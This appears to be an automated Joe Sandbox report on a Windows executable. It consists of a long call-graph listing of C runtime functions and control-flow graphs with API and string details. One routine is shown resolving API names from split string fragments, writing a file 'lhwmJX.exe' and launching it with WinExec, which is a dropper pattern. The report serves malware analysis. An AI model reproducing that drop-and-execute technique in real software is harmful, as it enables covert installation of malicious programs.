8607->8608 8609 40bbcf 8607->8609 8611 40bbf9 8608->8611 8613 40bc20 8608->8613 8610 403737 __set_osfhnd 67 API calls 8609->8610 8612 40bbd4 8610->8612 8614 403737 __set_osfhnd 67 API calls 8611->8614 8615 403724 strtoxl 67 API calls 8612->8615 8617 40bc3f 8613->8617 8630 40bc53 8613->8630 8616 40bbfe 8614->8616 8618 40bbdc 8615->8618 8620 403724 strtoxl 67 API calls 8616->8620 8621 403737 __set_osfhnd 67 API calls 8617->8621 8618->8131 8619 40bcab 8624 403737 __set_osfhnd 67 API calls 8619->8624 8623 40bc05 8620->8623 8622 40bc44 8621->8622 8625 403724 strtoxl 67 API calls 8622->8625 8626 4036bc strtoxl 6 API calls 8623->8626 8627 40bcb0 8624->8627 8629 40bc4b 8625->8629 8626->8618 8628 403724 strtoxl 67 API calls 8627->8628 8628->8629 8632 4036bc strtoxl 6 API calls 8629->8632 8630->8618 8630->8619 8631 40bc87 8630->8631 8634 40bccc 8630->8634 8631->8619 8633 40bc92 ReadFile 8631->8633 8632->8618 8638 40c139 GetLastError 8633->8638 8639 40bdbe 8633->8639 8636 40395c __malloc_crt 67 API calls 8634->8636 8637 40bce2 8636->8637 8642 40bd08 8637->8642 8643 40bcea 8637->8643 8640 40c146 8638->8640 8641 40bfbf 8638->8641 8639->8638 8644 40bdd2 8639->8644 8646 403724 strtoxl 67 API calls 8640->8646 8650 40374a __dosmaperr 67 API calls 8641->8650 8654 40bf44 8641->8654 8645 409390 __lseeki64_nolock 69 API calls 8642->8645 8647 403724 strtoxl 67 API calls 8643->8647 8644->8654 8660 40c004 8644->8660 8665 40bdee 8644->8665 8645->8633 8648 40c14b 8646->8648 8649 40bcef 8647->8649 8651 403737 __set_osfhnd 67 API calls 8648->8651 8652 403737 __set_osfhnd 67 API calls 8649->8652 8650->8654 8651->8654 8652->8618 8653 403a8d __crtLCMapStringA_stat 67 API calls 8653->8618 8654->8618 8654->8653 8655 40be54 ReadFile 8657 40be72 GetLastError 8655->8657 8655->8665 8656 40c07c ReadFile 8658 40c09b GetLastError 8656->8658 8656->8660 8657->8665 8658->8660 8660->8654 8660->8656 8669 409390 __lseeki64_nolock 69 API calls 8660->8669 8661 40bfb9 GetLastError 8661->8641 8662 40bed1 8662->8654 8663 40bf4c 8662->8663 8664 40bf3f 8662->8664 8667 40bf09 MultiByteToWideChar 8662->8667 8663->8667 8670 409390 __lseeki64_nolock 69 API calls 8663->8670 8666 403724 strtoxl 67 API calls 8664->8666 8665->8655 8665->8662 8668 409390 __lseeki64_nolock 69 API calls 8665->8668 8666->8654 8667->8654 8667->8661 8668->8665 8669->8660 8670->8667 8674 40a5d9 LeaveCriticalSection 8671->8674 8673 40c270 8673->8125 8674->8673 8678 40a5d9 LeaveCriticalSection 8675->8678 8677 40a15c 8677->8155 8678->8677 8680 401fd7 8679->8680 8681 401fe9 8679->8681 8680->8163 8684 401f78 8681->8684 8685 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8684->8685 8686 401f8b 8685->8686 8687 401fa5 8686->8687 8689 405414 8686->8689 8687->8163 8690 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8689->8690 8691 405428 8690->8691 8692 4067a4 __isleadbyte_l 77 API calls 8691->8692 8695 405435 8691->8695 8693 40545d 8692->8693 8694 408abc ___crtGetStringTypeA 91 API calls 8693->8694 8694->8695 8695->8687 8702 401ca4 8696->8702 8761 4041bf 8699->8761 8703 401d35 8702->8703 8707 401cb8 8702->8707 8704 403724 strtoxl 67 API calls 8703->8704 8705 401e4c 8704->8705 8706 4036bc strtoxl 6 API calls 8705->8706 8712 4010ff 8705->8712 8706->8712 8707->8703 8711 401d27 8707->8711 8723 40434c 8707->8723 8708 404334 __splitpath_helper 77 API calls 8708->8711 8710 401e02 8710->8703 8710->8712 8714 401e75 8710->8714 8711->8708 8720 401d7f 8711->8720 8722 401da0 8711->8722 8712->8172 8712->8174 8713 401dbd 8713->8703 8715 401dd8 8713->8715 8718 40434c __cftof 77 API calls 8713->8718 8716 40434c __cftof 77 API calls 8714->8716 8715->8703 8715->8712 8717 401dec 8715->8717 8716->8712 8719 40434c __cftof 77 API calls 8717->8719 8718->8715 8719->8712 8720->8703 8721 40434c __cftof 77 API calls 8720->8721 8720->8722 8721->8722 8722->8710 8722->8713 8726 4082e9 8723->8726 8727 4082fd 8726->8727 8728 408301 8727->8728 8729 408334 8727->8729 8730 403724 strtoxl 67 API calls 8728->8730 8753 404364 8728->8753 8733 408363 8729->8733 8734 408345 8729->8734 8729->8753 8731 40831b 8730->8731 8732 4036bc strtoxl 6 API calls 8731->8732 8732->8753 8735 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8733->8735 8736 403724 strtoxl 67 API calls 8734->8736 8737 40836e 8735->8737 8738 40834c 8736->8738 8739 408376 8737->8739 8742 40838b 8737->8742 8740 4036bc strtoxl 6 API calls 8738->8740 8741 408e26 __NMSG_WRITE 67 API calls 8739->8741 8740->8753 8741->8753 8743 4083c7 8742->8743 8744 40848f 8742->8744 8745 408406 8743->8745 8746 4083f9 8743->8746 8758 40431b 8743->8758 8747 4084c0 8744->8747 8750 40431b __mbsnbcpy_s_l 77 API calls 8744->8750 8744->8753 8749 408466 8745->8749 8757 40840c 8745->8757 8746->8745 8746->8747 8751 403724 strtoxl 67 API calls 8747->8751 8747->8753 8752 403724 strtoxl 67 API calls 8749->8752 8750->8744 8751->8753 8754 40846d 8752->8754 8753->8711 8755 4036bc strtoxl 6 API calls 8754->8755 8755->8753 8756 40431b __mbsnbcpy_s_l 77 API calls 8756->8757 8757->8753 8757->8756 8759 4042c8 x_ismbbtype_l 77 API calls 8758->8759 8760 40432f 8759->8760 8760->8743 8762 4041d1 8761->8762 8763 4041d6 8761->8763 8762->8763 8769 4041f6 8762->8769 8764 403724 strtoxl 67 API calls 8763->8764 8768 4041db 8764->8768 8765 4036bc strtoxl 6 API calls 8767 40118b 8765->8767 8766 403724 strtoxl 67 API calls 8766->8768 8767->8181 8768->8765 8771 404246 8769->8771 8772 4082d2 8769->8772 8771->8766 8771->8767 8775 408239 8772->8775 8776 408265 8775->8776 8777 408249 8775->8777 8778 408287 8776->8778 8779 40826d 8776->8779 8780 403724 strtoxl 67 API calls 8777->8780 8784 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8778->8784 8787 40825e 8778->8787 8781 403724 strtoxl 67 API calls 8779->8781 8782 40824e 8780->8782 8783 408272 8781->8783 8785 4036bc strtoxl 6 API calls 8782->8785 8786 4036bc strtoxl 6 API calls 8783->8786 8784->8787 8785->8787 8786->8787 8787->8771 8789 40cad6 8788->8789 8791 40caf6 8788->8791 8790 403724 strtoxl 67 API calls 8789->8790 8792 40cadb 8790->8792 8791->8789 8794 40cb0b 8791->8794 8793 4036bc strtoxl 6 API calls 8792->8793 8812 40caeb 8793->8812 8838 40d728 8794->8838 8797 40d728 __execve 77 API calls 8798 40cb1e 8797->8798 8826 40cb9f 8798->8826 8841 40ba76 8798->8841 8800 40d728 __execve 77 API calls 8801 40cbc0 8800->8801 8802 40cbf2 _strlen 8801->8802 8803 40cbc6 8801->8803 8807 4039a1 __calloc_crt 67 API calls 8802->8807 8844 40d5e3 8803->8844 8805 40cb39 _strlen 8808 4039a1 __calloc_crt 67 API calls 8805->8808 8805->8826 8806 40cbcf 8809 40cbe7 8806->8809 8862 40ca47 8806->8862 8811 40cc07 8807->8811 8813 40cb54 8808->8813 8809->8812 8814 403a8d __crtLCMapStringA_stat 67 API calls 8809->8814 8811->8812 8815 408edb _strcpy_s 67 API calls 8811->8815 8812->8200 8813->8812 8816 408edb _strcpy_s 67 API calls 8813->8816 8814->8812 8817 40cc23 8815->8817 8818 40cb70 8816->8818 8819 40cc34 _strlen 8817->8819 8822 403594 __invoke_watson 10 API calls 8817->8822 8820 40cb81 8818->8820 8823 403594 __invoke_watson 10 API calls 8818->8823 8825 403724 strtoxl 67 API calls 8819->8825 8821 408d66 _strcat_s 67 API calls 8820->8821 8824 40cb8e 8821->8824 8822->8819 8823->8820 8824->8826 8827 403594 __invoke_watson 10 API calls 8824->8827 8831 40cc4a 8825->8831 8826->8800 8827->8826 8828 408edb _strcpy_s 67 API calls 8828->8831 8829 403594 __invoke_watson 10 API calls 8829->8831 8830 40d5e3 __waccess_s 69 API calls 8830->8831 8831->8828 8831->8829 8831->8830 8832 40cc9b 8831->8832 8833 40cc99 8831->8833 8834 403724 strtoxl 67 API calls 8832->8834 8837 403a8d __crtLCMapStringA_stat 67 API calls 8833->8837 8835 40cca0 8834->8835 8836 40ca47 _wcomexecmd 136 API calls 8835->8836 8836->8833 8837->8809 8877 40d66c 8838->8877 8840 40cb14 8840->8797 8884 40b9ba 8841->8884 8843 40ba88 8843->8805 8845 40d5f0 8844->8845 8846 40d614 8844->8846 8848 403737 __set_osfhnd 67 API calls 8845->8848 8846->8845 8847 40d61d GetFileAttributesA 8846->8847 8849 40d62b GetLastError 8847->8849 8857 40d641 8847->8857 8850 40d5f5 8848->8850 8852 40374a __dosmaperr 67 API calls 8849->8852 8851 403724 strtoxl 67 API calls 8850->8851 8854 40d5fc 8851->8854 8855 40d637 8852->8855 8853 40d60c 8853->8806 8856 4036bc strtoxl 6 API calls 8854->8856 8859 403724 strtoxl 67 API calls 8855->8859 8856->8853 8857->8853 8858 403737 __set_osfhnd 67 API calls 8857->8858 8860 40d654 8858->8860 8859->8853 8861 403724 strtoxl 67 API calls 8860->8861 8861->8855 8863 40ca73 8862->8863 8864 40ca56 8862->8864 8863->8864 8865 40ca78 8863->8865 8866 403724 strtoxl 67 API calls 8864->8866 8891 40d20a 8865->8891 8868 40ca5b 8866->8868 8870 4036bc strtoxl 6 API calls 8868->8870 8871 40ca6b 8870->8871 8871->8809 8874 403a8d __crtLCMapStringA_stat 67 API calls 8875 40cab0 8874->8875 8876 403a8d __crtLCMapStringA_stat 67 API calls 8875->8876 8876->8871 8878 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8877->8878 8879 40d685 8878->8879 8880 403724 strtoxl 67 API calls 8879->8880 8883 40d6a1 _strrchr 8879->8883 8881 40d691 8880->8881 8882 4036bc strtoxl 6 API calls 8881->8882 8882->8883 8883->8840 8885 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 8884->8885 8886 40b9ce 8885->8886 8887 403724 strtoxl 67 API calls 8886->8887 8890 40b9ec __mbschr_l 8886->8890 8888 40b9dc 8887->8888 8889 4036bc strtoxl 6 API calls 8888->8889 8889->8890 8890->8843 8892 40d258 _strlen 8891->8892 8893 4039a1 __calloc_crt 67 API calls 8892->8893 8894 40d277 8893->8894 8895 40d282 8894->8895 8896 40d2a5 8894->8896 8898 403724 strtoxl 67 API calls 8895->8898 8978 40ad6f 8896->8978 8900 40d28c 8898->8900 8899 40d2b3 8901 40d2ba 8899->8901 8913 40d2ce _strlen 8899->8913 8902 403737 __set_osfhnd 67 API calls 8900->8902 8903 40d2c9 8901->8903 8904 403594 __invoke_watson 10 API calls 8901->8904 8914 40d297 8902->8914 8905 403a8d __crtLCMapStringA_stat 67 API calls 8903->8905 8904->8903 8948 40d33b 8905->8948 8906 401ee2 __crtLCMapStringA_stat 5 API calls 8907 40ca8e 8906->8907 8907->8871 8949 40cffb 8907->8949 8908 40d348 8912 408edb _strcpy_s 67 API calls 8908->8912 8922 40d35c _strlen 8908->8922 8915 40d45c 8912->8915 8913->8908 8916 406311 ___crtGetEnvironmentStringsA 76 API calls 8913->8916 8930 40d362 _strlen 8913->8930 8914->8906 8915->8922 8917 40d324 8916->8917 8917->8903 8917->8930 8918 408edb _strcpy_s 67 API calls 8918->8922 8920 40d3fe 8924 4039a1 __calloc_crt 67 API calls 8920->8924 8921 403594 __invoke_watson 10 API calls 8921->8922 8922->8918 8922->8921 8929 40d4bd ___crtGetEnvironmentStringsA _strlen 8922->8929 8923 40d531 8923->8948 8925 408edb _strcpy_s 67 API calls 8925->8929 8929->8923 8929->8925 8935 403594 __invoke_watson 10 API calls 8929->8935 8929->8948 8930->8920 9002 40d907 8930->9002 8935->8929 8952 40d014 8949->8952 8960 40d025 _memset 8949->8960 8950 40d031 8951 403737 __set_osfhnd 67 API calls 8950->8951 8953 40d036 8951->8953 8952->8950 8952->8960 8954 403724 strtoxl 67 API calls 8953->8954 8956 40d03d 8954->8956 8955 40d1f7 8959 403724 strtoxl 67 API calls 8955->8959 8958 4036bc strtoxl 6 API calls 8956->8958 8957 4039a1 __calloc_crt 67 API calls 8961 40d0da 8957->8961 8962 40caa6 8958->8962 8959->8962 8960->8955 8960->8957 8961->8955 8964 40d0e7 8961->8964 8962->8874 8963 403737 __set_osfhnd 67 API calls 8965 40d169 CreateProcessA GetLastError 8963->8965 8964->8963 8966 403a8d __crtLCMapStringA_stat 67 API calls 8965->8966 8967 40d19c 8966->8967 8968 40d1a1 8967->8968 8969 40d1aa 8967->8969 8970 40374a __dosmaperr 67 API calls 8968->8970 8971 40d1b6 8969->8971 9128 4023ea 8969->9128 8970->8962 8973 40d1c1 WaitForSingleObject GetExitCodeProcess 8971->8973 8974 40d1de 8971->8974 8979 40ad7b _doexit 8978->8979 8980 403ec9 __lock 67 API calls 8979->8980 8981 40ad82 8980->8981 8982 40ad96 8981->8982 8985 40adcc 8981->8985 8983 403724 strtoxl 67 API calls 8982->8983 8984 40ad9b 8983->8984 8986 4036bc strtoxl 6 API calls 8984->8986 9005 40ace8 8985->9005 9000 40adaa 8986->9000 8989 40add4 _strlen 8990 401a96 _calloc 67 API calls 8989->8990 8989->9000 8992 40aded 8990->8992 8991 40ae43 _doexit 8991->8899 8993 40adf6 8992->8993 8994 40ae0d 8992->8994 8995 403724 strtoxl 67 API calls 8993->8995 8996 408edb _strcpy_s 67 API calls 8994->8996 8997 40adfb 8995->8997 8998 40ae17 8996->8998 8999 403724 strtoxl 67 API calls 8997->8999 8998->9000 9001 403594 __invoke_watson 10 API calls 8998->9001 8999->9000 9011 40ae4c 9000->9011 9001->9000 9092 40d73f 9002->9092 9006 40acfd 9005->9006 9007 40ad01 9005->9007 9006->8989 9007->9006 9009 40ad13 _strlen 9007->9009 9014 40b0d9 9007->9014 9009->9006 9024 40b0bf 9009->9024 9091 403def LeaveCriticalSection 9011->9091 9013 40ae53 9013->8991 9021 40b159 9014->9021 9022 40b0f4 9014->9022 9015 40b0fa WideCharToMultiByte 9015->9021 9015->9022 9016 4039a1 __calloc_crt 67 API calls 9016->9022 9017 40b11d WideCharToMultiByte 9018 40b165 9017->9018 9017->9022 9019 403a8d __crtLCMapStringA_stat 67 API calls 9018->9019 9019->9021 9021->9009 9022->9015 9022->9016 9022->9017 9022->9021 9023 403a8d __crtLCMapStringA_stat 67 API calls 9022->9023 9027 40b71a 9022->9027 9023->9022 9073 40afd1 9024->9073 9028 40b74c 9027->9028 9029 40b72f 9027->9029 9030 40b7aa 9028->9030 9032 40ba76 __execve 77 API calls 9028->9032 9031 403724 strtoxl 67 API calls 9029->9031 9034 403724 strtoxl 67 API calls 9030->9034 9033 40b734 9031->9033 9037 40b75f 9032->9037 9035 4036bc strtoxl 6 API calls 9033->9035 9062 40b744 9034->9062 9035->9062 9036 40b78b 9039 40b7e8 9036->9039 9040 40b7bd 9036->9040 9041 40b7a1 9036->9041 9037->9030 9037->9036 9038 40b6c0 _copy_environ 67 API calls 9037->9038 9038->9036 9042 40b66e ___crtsetenv 111 API calls 9039->9042 9039->9062 9044 40395c __malloc_crt 67 API calls 9040->9044 9040->9062 9045 40b0d9 ___wtomb_environ 120 API calls 9041->9045 9043 40b80c 9042->9043 9046 40b865 9043->9046 9049 40b817 9043->9049 9047 40b7cd 9044->9047 9048 40b7a6 9045->9048 9047->9039 9053 40395c __malloc_crt 67 API calls 9047->9053 9047->9062 9048->9030 9048->9039 9053->9039 9062->9022 9074 401ef1 _LocaleUpdate::_LocaleUpdate 77 API calls 9073->9074 9075 40afe5 9074->9075 9076 40b006 9075->9076 9078 40b039 9075->9078 9087 40afee 9075->9087 9077 403724 strtoxl 67 API calls 9076->9077 9079 40b00b 9077->9079 9080 40b043 9078->9080 9081 40b05d 9078->9081 9082 4036bc strtoxl 6 API calls 9079->9082 9083 403724 strtoxl 67 API calls 9080->9083 9084 40b065 9081->9084 9085 40b079 9081->9085 9082->9087 9088 40b048 9083->9088 9089 40b574 __strnicoll_l 111 API calls 9084->9089 9086 40b532 ___crtCompareStringA 100 API calls 9085->9086 9086->9087 9087->9009 9090 4036bc strtoxl 6 API calls 9088->9090 9089->9087 9090->9087 9091->9013 9093 40d756 9092->9093 9131 4022a8 9128->9131 9157 402024 9156->9157 9158 402007 9156->9158 9157->9158 9160 40202b 9157->9160 9159 403724 strtoxl 67 API calls 9158->9159 9161 40200c 9159->9161 9162 402767 __output_l 103 API calls 9160->9162 9163 4036bc strtoxl 6 API calls 9161->9163 9164 402051 9162->9164 9165 40201c 9163->9165 9164->9165 9167 4054cc 9164->9167 9165->8209 9168 403553 __fileno 67 API calls 9167->9168 9169 4054dc 9168->9169 9170 4054e7 9169->9170 9171 4054fe 9169->9171 9172 403724 strtoxl 67 API calls 9170->9172 9173 405502 9171->9173 9174 40550f __stbuf 9171->9174 9176 4054ec 9172->9176 9175 403724 strtoxl 67 API calls 9173->9175 9174->9176 9182 40650e __stbuf 67 API calls 9174->9182 9184 405565 9174->9184 9187 405570 9174->9187 9175->9176 9176->9165 9177 4055ff 9179 40807c __locking 101 API calls 9177->9179 9178 40557f 9180 405596 9178->9180 9183 4055b3 9178->9183 9179->9176 9181 40807c __locking 101 API calls 9180->9181 9181->9176 9182->9184 9183->9176 9191 409415 9183->9191 9184->9187 9188 40952e 9184->9188 9187->9177 9187->9178 9189 40395c __malloc_crt 67 API calls 9188->9189 9190 409543 9189->9190 9190->9187 9192 409421 _doexit 9191->9192 9193 409432 9192->9193 9194 40944e 9192->9194 9195 403737 __set_osfhnd 67 API calls 9193->9195 9196 40945c 9194->9196 9198 40947d 9194->9198 9197 409437 9195->9197 9199 403737 __set_osfhnd 67 API calls 9196->9199 9200 403724 strtoxl 67 API calls 9197->9200 9202 4094c3 9198->9202 9203 40949d 9198->9203 9201 409461 9199->9201 9215 40943f _doexit 9200->9215 9206 403724 strtoxl 67 API calls 9201->9206 9205 40a539 ___lock_fhandle 68 API calls 9202->9205 9204 403737 __set_osfhnd 67 API calls 9203->9204 9207 4094a2 9204->9207 9208 4094c9 9205->9208 9209 409468 9206->9209 9210 403724 strtoxl 67 API calls 9207->9210 9211 4094f2 9208->9211 9212 4094d6 9208->9212 9213 4036bc strtoxl 6 API calls 9209->9213 9214 4094a9 9210->9214 9217 403724 strtoxl 67 API calls 9211->9217 9216 409390 __lseeki64_nolock 69 API calls 9212->9216 9213->9215 9218 4036bc strtoxl 6 API calls 9214->9218 9215->9176 9219 4094e7 9216->9219 9220 4094f7 9217->9220 9218->9215 9223 409524 9219->9223 9221 403737 __set_osfhnd 67 API calls 9220->9221 9221->9219 9226 40a5d9 LeaveCriticalSection 9223->9226 9225 40952c 9225->9215 9226->9225 9253 405158 9254 405164 _doexit 9253->9254 9255 40517c 9254->9255 9256 403a8d __crtLCMapStringA_stat 67 API calls 9254->9256 9258 405266 _doexit 9254->9258 9257 40518a 9255->9257 9259 403a8d __crtLCMapStringA_stat 67 API calls 9255->9259 9256->9255 9260 405198 9257->9260 9261 403a8d __crtLCMapStringA_stat 67 API calls 9257->9261 9259->9257 9262 4051a6 9260->9262 9264 403a8d __crtLCMapStringA_stat 67 API calls 9260->9264 9261->9260 9263 4051b4 9262->9263 9265 403a8d __crtLCMapStringA_stat 67 API calls 9262->9265 9266 4051c2 9263->9266 9267 403a8d __crtLCMapStringA_stat 67 API calls 9263->9267 9264->9262 9265->9263 9268 4051d0 9266->9268 9269 403a8d __crtLCMapStringA_stat 67 API calls 9266->9269 9267->9266 9270 4051e1 9268->9270 9272 403a8d __crtLCMapStringA_stat 67 API calls 9268->9272 9269->9268 9271 403ec9 __lock 67 API calls 9270->9271 9273 4051e9 9271->9273 9272->9270 9274 4051f5 InterlockedDecrement 9273->9274 9275 40520e 9273->9275 9274->9275 9276 405200 9274->9276 9289 405272 9275->9289 9276->9275 9279 403a8d __crtLCMapStringA_stat 67 API calls 9276->9279 9279->9275 9280 403ec9 __lock 67 API calls 9281 405222 9280->9281 9283 404d2a ___removelocaleref 8 API calls 9281->9283 9288 405253 9281->9288 9286 405237 9283->9286 9285 403a8d __crtLCMapStringA_stat 67 API calls 9285->9258 9287 404b52 ___freetlocinfo 67 API calls 9286->9287 9286->9288 9287->9288 9292 40527e 9288->9292 9295 403def LeaveCriticalSection 9289->9295 9291 40521b 9291->9280 9296 403def LeaveCriticalSection 9292->9296 9294 405260 9294->9285 9295->9291 9296->9294 9366 401998 9373 403d44 9366->9373 9369 4019ab 9371 403a8d __crtLCMapStringA_stat 67 API calls 9369->9371 9372 4019b6 9371->9372 9386 403c6a 9373->9386 9375 40199d 9375->9369 9376 403b1b 9375->9376 9377 403b27 _doexit 9376->9377 9378 403ec9 __lock 67 API calls 9377->9378 9381 403b33 9378->9381 9379 403b9c 9427 403bb1 9379->9427 9381->9379 9384 403b71 DeleteCriticalSection 9381->9384 9414 4078cd 9381->9414 9382 403ba8 _doexit 9382->9369 9385 403a8d __crtLCMapStringA_stat 67 API calls 9384->9385 9385->9381 9387 403c76 _doexit 9386->9387 9388 403ec9 __lock 67 API calls 9387->9388 9395 403c85 9388->9395 9389 403d1d 9404 403d3b 9389->9404 9392 403d29 _doexit 9392->9375 9394 403c22 105 API calls __fflush_nolock 9394->9395 9395->9389 9395->9394 9396 4019f9 9395->9396 9401 403d0c 9395->9401 9397 401a06 9396->9397 9398 401a1c EnterCriticalSection 9396->9398 9399 403ec9 __lock 67 API calls 9397->9399 9398->9395 9400 401a0f 9399->9400 9400->9395 9407 401a67 9401->9407 9403 403d1a 9403->9395 9413 403def LeaveCriticalSection 9404->9413 9406 403d42 9406->9392 9408 401a77 9407->9408 9409 401a8a LeaveCriticalSection 9407->9409 9412 403def LeaveCriticalSection 9408->9412 9409->9403 9411 401a87 9411->9403 9412->9411 9413->9406 9415 4078d9 _doexit 9414->9415 9416 40790a 9415->9416 9417 4078ed 9415->9417 9419 4019b8 __lock_file 68 API calls 9416->9419 9423 407902 _doexit 9416->9423 9418 403724 strtoxl 67 API calls 9417->9418 9420 4078f2 9418->9420 9421 407922 9419->9421 9422 4036bc strtoxl 6 API calls 9420->9422 9430 407856 9421->9430 9422->9423 9423->9381 9453 403def LeaveCriticalSection 9427->9453 9429 403bb8 9429->9382 9431 407886 9430->9431 9432 40786a 9430->9432 9434 40787f 9431->9434 9436 403bba __flush 101 API calls 9431->9436 9433 403724 strtoxl 67 API calls 9432->9433 9435 40786f 9433->9435 9446 407941 9434->9446 9437 4036bc strtoxl 6 API calls 9435->9437 9438 407892 9436->9438 9437->9434 9449 40a15e 9438->9449 9441 403553 __fileno 67 API calls 9442 4078a0 9441->9442 9443 40a091 __close 72 API calls 9442->9443 9444 4078a6 9443->9444 9444->9434 9445 403a8d __crtLCMapStringA_stat 67 API calls 9444->9445 9445->9434 9447 401a2b _fprintf 2 API calls 9446->9447 9448 407947 9447->9448 9448->9423 9450 40789a 9449->9450 9451 40a16e 9449->9451 9450->9441 9451->9450 9452 403a8d __crtLCMapStringA_stat 67 API calls 9451->9452 9452->9450 9453->9429

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 414044-414074 GetPEB 1 414077-41409a 0->1 2 41409d-4140a0 1->2 3 4140a6-4140bc 2->3 4 4141ee-41422b CreateFileA 2->4 5 414110-414116 3->5 6 4140be-4140c5 3->6 21 414265-414269 4->21 22 41422d-414230 4->22 9 414129-41412f 5->9 10 414118-41411f 5->10 6->5 7 4140c7-4140ce 6->7 7->5 14 4140d0-4140d7 7->14 12 414131-414138 9->12 13 414148-41414e 9->13 10->9 11 414121-414124 10->11 16 4141bb-4141c0 11->16 12->13 17 41413a-414141 12->17 18 414150-414157 13->18 19 414167-41416f 13->19 14->5 20 4140d9-4140dd 14->20 24 4141e0-4141e9 16->24 25 4141c2-4141c5 16->25 17->13 23 414143-414146 17->23 18->19 26 414159-414160 18->26 27 414171-414178 19->27 28 414188-41418e 19->28 20->5 29 4140df-4140e3 20->29 30 414232-414238 22->30 23->16 24->2 25->24 31 4141c7-4141ca 25->31 26->19 32 414162-414165 26->32 27->28 33 41417a-414181 27->33 35 414190-414197 28->35 36 4141a7-4141ad 28->36 29->16 34 4140e9-41410b 29->34 38 414246-414252 WriteFile 30->38 39 41423a-414242 30->39 31->24 40 4141cc-4141cf 31->40 32->16 33->28 41 414183-414186 33->41 34->1 35->36 42 414199-4141a0 35->42 36->16 37 4141af-4141b6 36->37 37->16 44 4141b8 37->44 46 414255-414262 CloseHandle WinExec 38->46 39->30 45 414244 39->45 40->24 47 4141d1-4141d4 40->47 41->16 42->36 43 4141a2-4141a5 42->43 43->16 44->16 45->46 46->21 47->24 49 4141d6-4141d9 47->49 49->24 50 4141db-4141de 49->50 50->4 50->24
                                APIs
                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00414223
                                • WriteFile.KERNELBASE(00000000,FFFEE376,00003E00,?,00000000), ref: 00414252
                                • CloseHandle.KERNELBASE(00000000), ref: 00414256
                                • WinExec.KERNEL32(?,00000005), ref: 00414262
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: File$CloseCreateExecHandleWrite
                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lhwmJX.exe$lstr$odul
                                • API String ID: 3741012433-3165335678
                                • Opcode ID: 99656044aced93209d6b99c8531b9466bb2c5cb2e1b473b31b61a1251caa54da
                                • Instruction ID: 13a8660bd61ee636bc4ab6606bb88dd14397b52f92bfab53bc47a8a202071d24
                                • Opcode Fuzzy Hash: 99656044aced93209d6b99c8531b9466bb2c5cb2e1b473b31b61a1251caa54da
                                • Instruction Fuzzy Hash: 1C612978D00215ABCF24CF90D848AEEBBB0BB94315F2582ABD405A7701C3789EC1CB99

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: _fprintf$FileModuleName__close__execv__open__read_calloc_strncmp
                                • String ID: #!python.exe$-script.py$Cannot find Python executable %s$Cannot open %s$Could not exec %s
                                • API String ID: 2502740745-2140616494
                                • Opcode ID: d61dc47c1f6b3fc5c978a5c87932c43162ec3572d0ae017d735f52c74d84159e
                                • Instruction ID: 25c8925ce12de3f480e09760b7f2022446e318c11543bd00bd3da7588873c4e1
                                • Opcode Fuzzy Hash: d61dc47c1f6b3fc5c978a5c87932c43162ec3572d0ae017d735f52c74d84159e
                                • Instruction Fuzzy Hash: 1E8125719043419BD321EF65D841B9B73E8AFD8304F14497EF4C9A73E2E639A9048B9B

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 121 4021b8-4021c9 call 40218d ExitProcess
                                APIs
                                • ___crtCorExitProcess.LIBCMT ref: 004021C0
                                  • Part of subcall function 0040218D: GetModuleHandleW.KERNEL32(mscoree.dll,?,004021C5,?,?,00406A6B,000000FF,0000001E,?,0040396D,?,00000001,?,?,00403E53,00000018), ref: 00402197
                                  • Part of subcall function 0040218D: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004021A7
                                • ExitProcess.KERNEL32 ref: 004021C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
